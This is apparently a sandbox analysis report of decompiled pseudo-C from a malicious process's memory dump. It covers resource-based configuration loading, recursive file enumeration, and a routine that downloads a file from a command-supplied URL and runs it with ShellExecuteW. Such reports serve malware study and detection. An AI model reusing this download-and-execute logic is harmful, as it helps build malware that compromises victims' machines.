                				intOrPtr* _v8;
                				short _v12;
                				signed int _v32;
                				intOrPtr _v40;
                				signed int _v52;
                				char _v272;
                				short _v292;
                				void* __ebp;
                				void* _t34;
                				short* _t35;
                				intOrPtr* _t36;
                				signed int _t39;
                				signed short* _t44;
                				intOrPtr _t47;
                				void* _t49;
                				signed int _t52;
                				signed int _t58;
                				signed int _t60;
                				signed int _t66;
                				void* _t68;
                				void* _t71;
                				void* _t76;
                				void* _t80;
                				intOrPtr _t87;
                				short* _t89;
                				void* _t90;
                				void* _t92;
                				short _t94;
                				void* _t95;
                				intOrPtr* _t98;
                				void* _t112;
                				void* _t116;
                				intOrPtr* _t118;
                				intOrPtr _t121;
                				signed int* _t122;
                				intOrPtr* _t125;
                				signed short _t127;
                				int _t129;
                				signed int _t132;
                				void* _t133;
                				signed int _t134;
                
                				_t115 = __edx;
                				_push(__ecx);
                				_push(__ecx);
                				_push(__ebx);
                				_push(__esi);
                				_push(__edi);
                				_t34 = E00446A95(__ebx, __ecx, __edx);
                				_t87 = _a4;
                				_t94 = 0;
                				_v12 = 0;
                				_t3 = _t34 + 0x50; // 0x50
                				_t125 = _t3;
                				_t4 = _t125 + 0x250; // 0x2a0
                				_t35 = _t4;
                				 *((intOrPtr*)(_t125 + 8)) = 0;
                				 *_t35 = 0;
                				_t6 = _t125 + 4; // 0x54
                				_t118 = _t6;
                				_v8 = _t35;
                				_t36 = _t87 + 0x80;
                				 *_t125 = _t87;
                				 *_t118 = _t36;
                				if( *_t36 != 0) {
                					E004504E9(0x45e200, 0x16, _t118);
                					_t133 = _t133 + 0xc;
                					_t94 = 0;
                				}
                				_push(_t125);
                				if( *((intOrPtr*)( *_t125)) == _t94) {
                					E0044FE5A(_t87, _t94, _t115, _t118, __eflags);
                					goto L12;
                				} else {
                					if( *((intOrPtr*)( *_t118)) == _t94) {
                						E0044FF7D();
                					} else {
                						E0044FEE3(_t94);
                					}
                					_pop(_t95);
                					if( *((intOrPtr*)(_t125 + 8)) == 0) {
                						_t80 = E004504E9(0x45def0, 0x40, _t125);
                						_t133 = _t133 + 0xc;
                						if(_t80 != 0) {
                							_push(_t125);
                							if( *((intOrPtr*)( *_t118)) == 0) {
                								E0044FF7D();
                							} else {
                								E0044FEE3(0);
                							}
                							L12:
                							_pop(_t95);
                						}
                					}
                				}
                				if( *((intOrPtr*)(_t125 + 8)) == 0) {
                					L31:
                					_t39 = 0;
                					__eflags = 0;
                					goto L32;
                				} else {
                					_t127 = E004503B7(_t95, _t87 + 0x100, _t125);
                					if(_t127 == 0 || _t127 == 0xfde8 || _t127 == 0xfde9 || IsValidCodePage(_t127 & 0x0000ffff) == 0) {
                						goto L31;
                					} else {
                						_t44 = _a8;
                						if(_t44 != 0) {
                							 *_t44 = _t127;
                						}
                						_t13 =  &_a12; // 0x443374
                						_t121 =  *_t13;
                						if(_t121 == 0) {
                							L30:
                							_t39 = 1;
                							goto L32;
                						} else {
                							_t98 = _v8;
                							_t89 = _t121 + 0x120;
                							 *_t89 = 0;
                							_t116 = _t98 + 2;
                							do {
                								_t47 =  *_t98;
                								_t98 = _t98 + 2;
                							} while (_t47 != _v12);
                							_t100 = _t98 - _t116 >> 1;
                							_push((_t98 - _t116 >> 1) + 1);
                							_t49 = E0044E949(_t98 - _t116 >> 1, _t89, 0x55, _v8);
                							_t134 = _t133 + 0x10;
                							_t153 = _t49;
                							if(_t49 != 0) {
                								_push(0);
                								_push(0);
                								_push(0);
                								_push(0);
                								_push(0);
                								E0043A5E8();
                								asm("int3");
                								_t132 = _t134;
                								_t52 =  *0x46f00c; // 0xd60a1515
                								_v52 = _t52 ^ _t132;
                								_push(_t89);
                								_push(_t127);
                								_push(_t121);
                								_t90 = E00446A95(_t89, _t100, _t116);
                								_t122 =  *(E00446A95(_t90, _t100, _t116) + 0x34c);
                								_t129 = E00450C6B(_v40);
                								asm("sbb ecx, ecx");
                								_t58 = GetLocaleInfoW(_t129, ( ~( *(_t90 + 0x64)) & 0xfffff005) + 0x1002,  &_v292, 0x78);
                								__eflags = _t58;
                								if(_t58 != 0) {
                									_t60 = E00452294(_t90, _t122, _t129,  *((intOrPtr*)(_t90 + 0x54)),  &_v272);
                									__eflags = _t60;
                									if(_t60 == 0) {
                										_t66 = E00450D9F(_t129);
                										__eflags = _t66;
                										if(_t66 != 0) {
                											 *_t122 =  *_t122 | 0x00000004;
                											__eflags =  *_t122;
                											_t122[2] = _t129;
                											_t122[1] = _t129;
                										}
                									}
                									__eflags =  !( *_t122 >> 2) & 0x00000001;
                								} else {
                									 *_t122 =  *_t122 & _t58;
                								}
                								__eflags = _v32 ^ _t132;
                								return E004338BB(_v32 ^ _t132);
                							} else {
                								_t68 = E0044716D(_t100, _t127, _t153, _t89, 0x1001, _t121, 0x40);
                								_t154 = _t68;
                								if(_t68 == 0) {
                									goto L31;
                								} else {
                									_t92 = _t121 + 0x80;
                									if(E0044716D(_t100, _t127, _t154, _t121 + 0x120, 0x1002, _t92, 0x40) == 0) {
                										goto L31;
                									} else {
                										_push(0x5f);
                										_t71 = E00456277(_t100);
                										_t112 = _t92;
                										if(_t71 != 0) {
                											L28:
                											if(E0044716D(_t112, _t127, _t157, _t121 + 0x120, 7, _t92, 0x40) == 0) {
                												goto L31;
                											} else {
                												goto L29;
                											}
                										} else {
                											_push(0x2e);
                											_t76 = E00456277(_t112);
                											_t112 = _t92;
                											_t157 = _t76;
                											if(_t76 == 0) {
                												L29:
                												E004407BF(_t112, _t127, _t121 + 0x100, 0x10, 0xa);
                												goto L30;
                											} else {
                												goto L28;
                											}
                										}
                									}
                								}
                								L32:
                								return _t39;
                							}
                						}
                					}
                				}
                			}

                APIs
                  • Part of subcall function 00446A95: GetLastError.KERNEL32(00000020,?,004390F5,?,?,?,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B), ref: 00446A99
                  • Part of subcall function 00446A95: _free.LIBCMT ref: 00446ACC
                  • Part of subcall function 00446A95: SetLastError.KERNEL32(00000000,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B,?,00000041,00000000,00000000), ref: 00446B0D
                  • Part of subcall function 00446A95: _abort.LIBCMT ref: 00446B13
                • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00443374,?,?,?,?,00442DCB,?,00000004), ref: 0045063A
                • _wcschr.LIBVCRUNTIME ref: 004506CA
                • _wcschr.LIBVCRUNTIME ref: 004506D8
                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,t3D,00000000,?), ref: 0045077B
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                • String ID: t3D
                • API String ID: 4212172061-694417703
                • Opcode ID: b9c9552eaca3d1881d3ae1f5d8ad23bd1f562e179b5fb4d1a587ec592402c2be
                • Instruction ID: ba7a9897b5b485b0d00a1d7db932209b8575a85ef4c726eb57bec7d4989f050b
                • Opcode Fuzzy Hash: b9c9552eaca3d1881d3ae1f5d8ad23bd1f562e179b5fb4d1a587ec592402c2be
                • Instruction Fuzzy Hash: 59610B75500706AAE724AB75CC42A6B73A8EF09705F14046FFD05DB282FB78ED488B69
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 94%
                			E00450CBC(void* __ecx, signed int _a4, intOrPtr _a8) {
                				short _v8;
                				short _t17;
                				signed int _t18;
                				signed int _t23;
                				signed int _t25;
                				signed int _t26;
                				signed int _t27;
                				void* _t30;
                				void* _t31;
                				intOrPtr _t32;
                				intOrPtr _t33;
                				intOrPtr* _t36;
                				intOrPtr* _t37;
                
                				_push(__ecx);
                				_t23 = _a4;
                				if(_t23 == 0) {
                					L21:
                					_t12 = _a8 + 8; // 0xfde8fe81
                					if(GetLocaleInfoW( *_t12, 0x20001004,  &_v8, 2) != 0) {
                						_t17 = _v8;
                						if(_t17 == 0) {
                							_t17 = GetACP();
                						}
                						L25:
                						return _t17;
                					}
                					L22:
                					_t17 = 0;
                					goto L25;
                				}
                				_t18 = 0;
                				if( *_t23 == 0) {
                					goto L21;
                				}
                				_t36 = 0x45e318;
                				_t25 = _t23;
                				while(1) {
                					_t30 =  *_t25;
                					if(_t30 !=  *_t36) {
                						break;
                					}
                					if(_t30 == 0) {
                						L7:
                						_t26 = _t18;
                						L9:
                						if(_t26 == 0) {
                							goto L21;
                						}
                						_t37 = 0x45e320;
                						_t27 = _t23;
                						while(1) {
                							_t31 =  *_t27;
                							if(_t31 !=  *_t37) {
                								break;
                							}
                							if(_t31 == 0) {
                								L17:
                								if(_t18 != 0) {
                									_t17 = E0043A382(_t23, _t23);
                									goto L25;
                								}
                								_t8 = _a8 + 8; // 0xfde8fe81
                								if(GetLocaleInfoW( *_t8, 0x2000000b,  &_v8, 2) == 0) {
                									goto L22;
                								}
                								_t17 = _v8;
                								goto L25;
                							}
                							_t32 =  *((intOrPtr*)(_t27 + 2));
                							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
                								break;
                							}
                							_t27 = _t27 + 4;
                							_t37 = _t37 + 4;
                							if(_t32 != 0) {
                								continue;
                							}
                							goto L17;
                						}
                						asm("sbb eax, eax");
                						_t18 = _t18 | 0x00000001;
                						goto L17;
                					}
                					_t33 =  *((intOrPtr*)(_t25 + 2));
                					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
                						break;
                					}
                					_t25 = _t25 + 4;
                					_t36 = _t36 + 4;
                					if(_t33 != 0) {
                						continue;
                					}
                					goto L7;
                				}
                				asm("sbb edx, edx");
                				_t26 = _t25 | 0x00000001;
                				goto L9;
                			}

                APIs
                • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,00450FDB,?,00000000), ref: 00450D55
                • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,00450FDB,?,00000000), ref: 00450D7E
                • GetACP.KERNEL32(?,?,00450FDB,?,00000000), ref: 00450D93
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: InfoLocale
                • String ID: ACP$OCP
                • API String ID: 2299586839-711371036
                • Opcode ID: e1cc0e8b5d55e55e0692ae403176d07c371e2c9d392849c0dfe23d3819b2362a
                • Instruction ID: f4dc62717276faaaa6782721abfec9566da5d0668c2a958c42eb904ffeb84586
                • Opcode Fuzzy Hash: e1cc0e8b5d55e55e0692ae403176d07c371e2c9d392849c0dfe23d3819b2362a
                • Instruction Fuzzy Hash: 2C21A73AA00205AAD7348F94D900A9B73B6EF54B52B568466ED0DDB203E736ED4DC398
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0041A003(void** __ecx) {
                				struct HRSRC__* _t1;
                				void* _t3;
                				long _t4;
                				void** _t5;
                				struct HRSRC__* _t7;
                
                				_t5 = __ecx;
                				_t1 = FindResourceA( *0x470d40, "SETTINGS", 0xa);
                				_t7 = _t1;
                				if(_t7 != 0) {
                					_t3 = LockResource(LoadResource( *0x470d40, _t7));
                					_t4 = SizeofResource( *0x470d40, _t7);
                					 *_t5 = _t3;
                					return _t4;
                				}
                				return _t1;
                			}

                APIs
                • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041A014
                • LoadResource.KERNEL32(00000000,?,?,0040E8FB,00000000), ref: 0041A028
                • LockResource.KERNEL32(00000000,?,?,0040E8FB,00000000), ref: 0041A02F
                • SizeofResource.KERNEL32(00000000,?,?,0040E8FB,00000000), ref: 0041A03E
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Resource$FindLoadLockSizeof
                • String ID: SETTINGS
                • API String ID: 3473537107-594951305
                • Opcode ID: 2d1e4ba86f2e32d2beda4657f94b09353a7239f4cfd5f7509494277a44e50716
                • Instruction ID: b95858df6d0456d97b6bbc8465da1c17ee9993c19fec26ac2e34289928cab2cf
                • Opcode Fuzzy Hash: 2d1e4ba86f2e32d2beda4657f94b09353a7239f4cfd5f7509494277a44e50716
                • Instruction Fuzzy Hash: 26E01A76205B10ABC7311FA1BC4CD073F29F789753B100035F909D6321DA358850CA59
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 93%
                			E00408D1B(intOrPtr __ecx, void* __edx, void* __eflags) {
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				intOrPtr* _t77;
                				intOrPtr* _t79;
                				signed int _t89;
                				signed int _t94;
                				intOrPtr* _t98;
                				void* _t115;
                				signed int _t123;
                				signed int _t125;
                				void* _t142;
                				signed int _t143;
                				intOrPtr _t146;
                				char* _t209;
                				void* _t213;
                				void* _t217;
                				void* _t219;
                				intOrPtr _t220;
                				void* _t221;
                				void* _t223;
                
                				_t146 = __ecx;
                				E00456328(E0045670D, _t217);
                				_t220 = _t219 - 0x308;
                				_push(_t142);
                				 *((intOrPtr*)(_t217 - 0x10)) = _t220;
                				 *((intOrPtr*)(_t217 - 0x18)) = _t146;
                				E004020BF(_t142, _t217 - 0x5c);
                				_t77 = E004022E5(_t217 + 0x20, _t217 - 0x1c);
                				_t79 = E004022AA(_t217 + 0x20, _t217 - 0x20);
                				E00409291(_t217 - 0x28,  *((intOrPtr*)(E004022E5(_t217 + 0x20, _t217 - 0x24))),  *_t79,  *_t77);
                				_t221 = _t220 + 0xc;
                				_t202 = _t217 + 8;
                				_t213 = FindFirstFileW(E00401EE4(E004087F0(_t217 - 0xbc, _t217 + 8, _t217, "*")), _t217 - 0x30c);
                				 *(_t217 - 0x1c) = _t213;
                				E00401EE9();
                				if(_t213 != 0xffffffff) {
                					_t143 = 0;
                					__eflags = 0;
                					while(1) {
                						_t89 = FindNextFileW(_t213, _t217 - 0x30c);
                						__eflags = _t89;
                						if(_t89 == 0) {
                							break;
                						}
                						_t209 =  *((intOrPtr*)(_t217 - 0x18));
                						__eflags =  *_t209;
                						if( *_t209 == 0) {
                							__eflags =  *(_t217 - 0x30c) & 0x00000010;
                							if(( *(_t217 - 0x30c) & 0x00000010) != 0) {
                								_t123 = E0043E224(_t217 - 0x2e0, _t217 - 0x2e0, 0x4644f0);
                								__eflags = _t123;
                								if(_t123 != 0) {
                									_t125 = E0043E224(_t217 - 0x2e0, _t217 - 0x2e0, L"..");
                									_pop(_t170);
                									__eflags = _t125;
                									if(__eflags != 0) {
                										_t202 = E00408876(_t143, _t217 - 0x8c, _t217 + 8, _t217, __eflags, E0040415E(_t143, _t217 - 0x74, _t202, _t217, _t217 - 0x2e0));
                										E004092BB(_t143, _t217 - 0xa4, _t128, _t209, __eflags);
                										E00401EE9();
                										E00401EE9();
                										_t223 = _t221 - 0x18;
                										E004086D0(_t143, _t223, _t128, __eflags, _t217 + 0x20);
                										_t221 = _t223 - 0x18;
                										E004086D0(_t143, _t221, _t128, __eflags, _t217 - 0xa4);
                										E00408D1B(_t209, _t202, __eflags);
                										E00401EE9();
                									}
                								}
                							}
                							E0040415E(_t143, _t217 - 0x40, _t202, _t217, _t217 - 0x2e0);
                							_t98 = E004022E5(_t217 - 0x40, _t217 - 0x28);
                							_t215 = E004022AA(_t217 - 0x40, _t217 - 0x24);
                							E00409291(_t217 - 0x44,  *((intOrPtr*)(E004022E5(_t217 - 0x40, _t217 - 0x20))),  *_t100,  *_t98);
                							_t221 = _t221 + 0xc;
                							__eflags = E00409114(_t217 - 0x40, _t217 + 0x20, _t143) - 0xffffffff;
                							if(__eflags == 0) {
                								L15:
                								E00401EE9();
                								_t213 =  *(_t217 - 0x1c);
                								continue;
                							} else {
                								E00401FC2(_t217 - 0x5c, _t202, _t215, E00402097(_t143, _t217 - 0x74, _t202, _t217, __eflags, _t217 - 0x30c, 0x250));
                								E00401FB8();
                								 *(_t217 - 4) = _t143;
                								_t221 = _t221 - 0x18;
                								_t202 = E00402EF0(_t143, _t217 - 0x74, E0041A879(_t143, _t217 - 0x8c, _t217 + 8), _t217, __eflags, 0x472ec8);
                								E00402EF0(_t143, _t221, _t113, _t217, __eflags, _t217 - 0x5c);
                								_push(0x66);
                								_t115 = E00404A81( *((intOrPtr*)(_t217 - 0x18)) + 4, _t113, __eflags);
                								__eflags = _t115 - 0xffffffff;
                								E00401FB8();
                								E00401FB8();
                								__eflags = _t143 & 0xffffff00 | _t115 == 0xffffffff;
                								if((_t143 & 0xffffff00 | _t115 == 0xffffffff) == 0) {
                									 *(_t217 - 4) =  *(_t217 - 4) | 0xffffffff;
                									_t143 = 0;
                									__eflags = 0;
                									goto L15;
                								}
                								E00401EE9();
                								E00401FB8();
                								E00401EE9();
                								E00401EE9();
                								_t94 = 0;
                								goto L17;
                							}
                						}
                						FindClose(_t213);
                						goto L6;
                					}
                					FindClose(_t213);
                					E00401FB8();
                					E00401EE9();
                					E00401EE9();
                					_t94 = 1;
                					goto L17;
                				} else {
                					_t143 = 1;
                					L6:
                					E00401FB8();
                					E00401EE9();
                					E00401EE9();
                					_t94 = _t143;
                					L17:
                					 *[fs:0x0] =  *((intOrPtr*)(_t217 - 0xc));
                					return _t94;
                				}
                			}

                APIs
                • __EH_prolog.LIBCMT ref: 00408D20
                • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 00408D98
                • FindNextFileW.KERNEL32(00000000,?), ref: 00408DC1
                • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408DD8
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Find$File$CloseFirstH_prologNext
                • String ID:
                • API String ID: 1157919129-0
                • Opcode ID: f23d2dba560608779638d8cfa0483366f34582b47cfd6e1a8bf63ed30e0f74ab
                • Instruction ID: b34c8ff471b712c414ce627f555fa5c2b30a51ca04011b772a5ffd3e96ebdc4c
                • Opcode Fuzzy Hash: f23d2dba560608779638d8cfa0483366f34582b47cfd6e1a8bf63ed30e0f74ab
                • Instruction Fuzzy Hash: 7D8153328001099BCB15EBA1DD969EE77B8AF54308F10417FE446B71E2EF385B49CB98
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 91%
                			E00407E80(void* __ecx, void* __edx, void* __eflags) {
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				void* _t62;
                				void* _t78;
                				void* _t88;
                				void* _t89;
                				void* _t97;
                				void* _t99;
                				void* _t111;
                				void* _t114;
                				void* _t118;
                				void* _t120;
                				void* _t167;
                				void* _t169;
                				void* _t170;
                				void* _t172;
                				void* _t174;
                				intOrPtr _t175;
                				void* _t176;
                				void* _t177;
                				void* _t179;
                				void* _t180;
                				void* _t181;
                				void* _t182;
                				void* _t183;
                				void* _t184;
                				void* _t185;
                
                				_t165 = __edx;
                				_t120 = __ecx;
                				E00456328(E004566F9, _t172);
                				_t175 = _t174 - 0x2b0;
                				_push(_t169);
                				_push(_t167);
                				 *((intOrPtr*)(_t172 - 0x10)) = _t175;
                				_t118 = _t120;
                				E004020BF(_t118, _t172 - 0x4c);
                				 *(_t172 - 0x18) =  *(_t172 - 0x18) | 0xffffffff;
                				if(_t118 != 0) {
                					_t165 = 0x46a8f0;
                					_t111 = E00406E3A(0x46a8f0);
                					_t188 = _t111;
                					if(_t111 != 0) {
                						_t185 = _t175 - 0x18;
                						E004086D0(_t118, _t185, 0x46a8f0, _t188, _t172 + 8);
                						_t114 = E00419F8D(_t118, _t172 - 0x34, 0x46a8f0, _t172);
                						_t175 = _t185 + 0x18;
                						E00401EF3(_t172 + 0x20, _t165, _t169, _t114);
                						E00401EE9();
                					}
                				}
                				_t176 = _t175 - 0x18;
                				E004086D0(_t118, _t176, _t165, _t188, _t172 + 8);
                				_t62 = E00419FC8(_t118, _t172 - 0x34, _t165, _t172);
                				_t177 = _t176 + 0x18;
                				E0040323D(_t62);
                				E00401EE9();
                				L004086C6(_t118, _t172 + 8, _t167, _t172, "\\");
                				 *(_t172 - 4) =  *(_t172 - 4) & 0x00000000;
                				_t166 = _t172 + 8;
                				_t170 = FindFirstFileW(E00401EE4(E004087F0(_t172 - 0x34, _t172 + 8, _t172, "*")), _t172 - 0x2b4);
                				 *(_t172 - 0x18) = _t170;
                				E00401EE9();
                				if(_t170 == 0xffffffff) {
                					 *((intOrPtr*)(_t172 - 0x1c)) = 2;
                					E004379F6(_t172 - 0x1c, 0x46ccd0);
                				}
                				while(FindNextFileW(_t170, _t172 - 0x2b4) != 0) {
                					if( *0x470b18 != 0) {
                						E00401FB8();
                						E00401EE9();
                						E00401EE9();
                						E00401FB8();
                						_t78 = 0;
                						__eflags = 0;
                						L15:
                						 *[fs:0x0] =  *((intOrPtr*)(_t172 - 0xc));
                						return _t78;
                					}
                					if(( *(_t172 - 0x2b4) & 0x00000010) == 0) {
                						_t179 = _t177 - 0x18;
                						E004020D6(_t118, _t179, _t166, __eflags, _t172 + 0x38);
                						_t180 = _t179 - 0x18;
                						E004086D0(_t118, _t180, _t166, __eflags, _t172 + 0x20);
                						_t88 = E0040415E(_t118, _t172 - 0x34, _t166, _t172, _t172 - 0x288);
                						_t166 = _t172 + 8;
                						_t89 = E00408876(_t118, _t172 - 0x64, _t172 + 8, _t172, __eflags, _t88);
                						_t181 = _t180 - 0x14;
                						E00403242(_t118, _t181, _t172, __eflags, _t89);
                						E004080F9(_t118, _t172 + 8, _t167);
                						_t177 = _t181 + 0x48;
                						E00401EE9();
                						L11:
                						E00401EE9();
                						continue;
                					}
                					if(E0043E224(_t172 - 0x288, _t172 - 0x288, 0x4644f0) == 0) {
                						continue;
                					}
                					_t97 = E0043E224(_t172 - 0x288, _t172 - 0x288, L"..");
                					_t194 = _t97;
                					if(_t97 == 0) {
                						continue;
                					}
                					_t99 = E0040415E(_t118, _t172 - 0x64, _t166, _t172, _t172 - 0x288);
                					_t166 = _t172 + 8;
                					E00408876(_t118, _t172 - 0x34, _t172 + 8, _t172, _t194, _t99);
                					E00401EE9();
                					_t182 = _t177 - 0x18;
                					E004020D6(_t118, _t182, _t172 + 8, _t194, _t172 + 0x38);
                					_t183 = _t182 - 0x18;
                					E004086D0(_t118, _t183, _t172 + 8, _t194, _t172 + 0x20);
                					_t184 = _t183 - 0x18;
                					E004086D0(_t118, _t184, _t166, _t194, _t172 - 0x34);
                					E00407E80(_t118, _t166, _t194);
                					_t177 = _t184 + 0x48;
                					goto L11;
                				}
                				 *(_t172 - 4) =  *(_t172 - 4) | 0xffffffff;
                				FindClose(_t170);
                				E00401FB8();
                				E00401EE9();
                				E00401EE9();
                				E00401FB8();
                				_t78 = 1;
                				goto L15;
                			}

                APIs
                • __EH_prolog.LIBCMT ref: 00407E85
                • FindFirstFileW.KERNEL32(00000000,?,004645D0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407F3E
                • __CxxThrowException@8.LIBVCRUNTIME ref: 00407F66
                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407F73
                • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408089
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                • String ID:
                • API String ID: 1771804793-0
                • Opcode ID: e51d4c18494591f064c9bea405c32cc60c670d4d3fb32e29913aff5c4e95ec4d
                • Instruction ID: eb919791392cef61e63247088396cac0e0337327006fc65e235cea095d5a35b6
                • Opcode Fuzzy Hash: e51d4c18494591f064c9bea405c32cc60c670d4d3fb32e29913aff5c4e95ec4d
                • Instruction Fuzzy Hash: 2F51517190020996CB04FBA1DD969DD77A8AF50308F50457FF846B31E2EF389B49CB9A
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 75%
                			E00406524(short* __edx, void* __eflags, intOrPtr _a4, char _a8) {
                				char _v28;
                				char _v44;
                				char _v60;
                				char _v64;
                				char _v68;
                				char _v72;
                				char _v76;
                				char _v84;
                				void* _v104;
                				void* __ebx;
                				void* __ebp;
                				intOrPtr* _t33;
                				void* _t50;
                				signed char _t54;
                				intOrPtr* _t57;
                				void* _t59;
                				void* _t63;
                				void* _t70;
                				void* _t72;
                				void* _t77;
                				intOrPtr* _t79;
                				short* _t83;
                				void* _t84;
                				void* _t85;
                				void* _t87;
                				void* _t105;
                				void* _t119;
                				void* _t143;
                				void* _t147;
                				void* _t154;
                				signed int _t155;
                				void* _t158;
                				void* _t159;
                				void* _t160;
                				void* _t162;
                				void* _t166;
                
                				_t166 = __eflags;
                				_t138 = __edx;
                				_t33 = E00401F8B( &_a8);
                				_push(0xffffffff);
                				_t87 = 4;
                				_push(_t87);
                				_push( &_v28);
                				E00404182( &_a8);
                				_t158 = (_t155 & 0xfffffff8) - 0x2c;
                				E004020D6(_t87, _t158, __edx, _t166, 0x472ec8);
                				_t159 = _t158 - 0x18;
                				E004020D6(_t87, _t159, __edx, _t166,  &_v44);
                				E0041A976( &_v84, __edx);
                				_t160 = _t159 + 0x30;
                				_t147 =  *_t33 - _t87;
                				if(_t147 == 0) {
                					_t143 = 0;
                					E00401E45( &_v64, __edx, _t154, __eflags, 0);
                					__eflags = E00405AE5("F");
                					if(__eflags == 0) {
                						E00401E45( &_v68, "F", _t154, __eflags, 0);
                						_t138 = "M";
                						__eflags = E00405AE5("M");
                						if(__eflags == 0) {
                							L23:
                							E00401E6D( &_v64, _t138);
                							E00401FB8();
                							E00401FB8();
                							return 0;
                						}
                						_v68 = 0;
                						_t50 = E00401F8B(E00401E45( &_v64, "M", _t154, __eflags, _t87));
                						_t138 =  &_v76;
                						__eflags = E0041A551(_t50,  &_v76,  &_v68);
                						if(__eflags == 0) {
                							_t105 = _t160 - 0x18;
                							_push("2");
                							L22:
                							E00402073(_t87, _t105, _t138, _t154);
                							_push(0xb3);
                							E00404A81(_a4, _t138, __eflags);
                							goto L23;
                						}
                						_t138 = _v72;
                						_t54 = E00417456(0x470b38);
                						L0043A61B(_v72);
                						_t162 = _t160 - 0x18;
                						__eflags = (_t54 & 0x000000ff) - 1;
                						L9:
                						_t105 = _t162;
                						if(__eflags != 0) {
                							_push("3");
                						} else {
                							_push("1");
                						}
                						goto L22;
                					}
                					_t57 = E00401F8B(E00401E45( &_v68, "F", _t154, __eflags, 2));
                					_t59 = E00401F8B(E00401E45( &_v68, "F", _t154, __eflags, 3));
                					_t138 =  *_t57;
                					E0040CF38( &_v60,  *_t57, _t59);
                					_t63 = E00401F8B(E00401E45( &_v72,  *_t57, _t154, __eflags, _t87));
                					__imp__URLDownloadToFileW(0, _t63, E00401EE4( &_v60), 0, 0);
                					__eflags = _t63;
                					if(__eflags == 0) {
                						L4:
                						if( *((char*)(E00401F8B(E00401E45( &_v84, _t138, _t154, _t170, 1)))) == 0) {
                							_t119 = _t160 - 0x18;
                							_push("0");
                						} else {
                							_t70 = ShellExecuteW(_t143, L"open", E00401EE4( &_v72), _t143, _t143, 1);
                							_t119 = _t160 - 0x18;
                							_t172 = _t70 - 0x20;
                							if(_t70 > 0x20) {
                								_push("1");
                							} else {
                								_push("3");
                							}
                						}
                						L17:
                						E00402073(_t87, _t119, _t138, _t154);
                						_push(0xb3);
                						E00404A81(_a4, _t138, _t172);
                						E00401EE9();
                						goto L23;
                					}
                					L14:
                					_t119 = _t160 - 0x18;
                					_push("2");
                					goto L17;
                				}
                				_t168 = _t147 != 1;
                				if(_t147 != 1) {
                					goto L23;
                				}
                				_t143 = 0;
                				E00401E45( &_v64, __edx, _t154, _t168, 0);
                				_t72 = E00405AE5("F");
                				_t169 = _t72;
                				if(_t72 == 0) {
                					E00401E45( &_v68, "F", _t154, __eflags, 0);
                					_t138 = "M";
                					__eflags = E00405AE5("M");
                					if(__eflags == 0) {
                						goto L23;
                					} else {
                						_t138 = E00401F8B(E00401E45( &_v64, "M", _t154, __eflags, _t87));
                						_t77 = E00417456(0x470b38);
                						_t162 = _t160 - 0x18;
                						__eflags = _t77 - 1;
                						goto L9;
                					}
                				}
                				_t79 = E00401F8B(E00401E45( &_v68, "F", _t154, _t169, 2));
                				E0040CF38( &_v60,  *_t79, E00401F8B(E00401E45( &_v68, "F", _t154, _t169, 3)));
                				_t83 = E00401EE4( &_v60);
                				_t84 = E00401E45( &_v72,  *_t79, _t154, _t169, _t87);
                				_t138 = _t83;
                				_t85 = E0041AE6B(_t84, _t83);
                				_t170 = _t85 - 1;
                				if(_t85 != 1) {
                					goto L14;
                				}
                				goto L4;
                			}








































                APIs
                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406630
                • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406714
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
